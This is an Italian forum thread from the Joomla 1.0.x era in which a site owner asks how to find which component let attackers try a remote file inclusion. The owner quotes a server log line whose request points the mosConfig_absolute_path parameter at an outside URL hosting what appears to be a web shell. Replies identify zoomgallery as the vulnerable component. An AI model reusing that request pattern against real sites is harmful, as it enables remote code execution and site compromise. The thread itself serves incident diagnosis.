Joomla.it Forum
Joomla! 1.0.x (versione con supporto terminato) => Le voci di Joomla.it (solo per versione Joomla 1.0.x) => : puitz 16 Oct 2007, 10:16:44
-
ho un problema di sicurezza con joomla! hanno cercato di fare una "remote file inclusion" tramite la variabile "mosConfig_absolute_path" questo perchè alcuni componenti presenti sul mio sito sono buggati (???)
il mio dubbio però è quello che il/i componente/i buggati nn abbiano versioni aggiornate...quindi mi toccherà ripiegare su soluzioni alternative...ma il problema principale è: come faccio ad identificare di preciso il componente interessato? dai log sembra che il problema sia joomla stesso...datemi un parere:
"GET /index.php?mosConfig_absolute_path=http://zone-az.org/r57.txt HTTP/1.0" 200 412 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.10 (build 01952); MRSPUTNIK 1, 8, 0, 17 SW; MEGAUPLOAD 2.0)"
-
Ciao puitz,
qui puoi trovare l'elenco ufficiale della vulnerabilità delle estensioni di joomla
http://help.joomla.org/component/option,com_easyfaq/task,view/id,186/Itemid,268/
-
grazie mille ste! ho trovato la pecora nera :P
ciauzzzzzzz
-
ciao, siccome in 5 giorni mi han disattivato il sito per 3 volte a causa di attacchi esterni, mi puoi gentilmente dire quale componente ti ha dato problemi, giusto per verificare se lo ho installato pure io e i miei guai partono da quello.
Grazie 1000 in anticipo
-
la pecora nera ora era zoomgallery
ma visto che di attacchi ne subisco ogni giorno, diciamo che la maggiorparte dei componenti ha bisogno di essere aggiornata o pacthata se proprio nn c'è una nuova versione.
controlla sull'url che ha postato ste, c'è una bella lista!
ciauzzzzzz
-
si ho letto la lista, il componente che mi preoccupava di più e che tu mi hai confermato è proprio zoomgallery :-[
una domanda, su che hosting sei?
grazie 1000 :)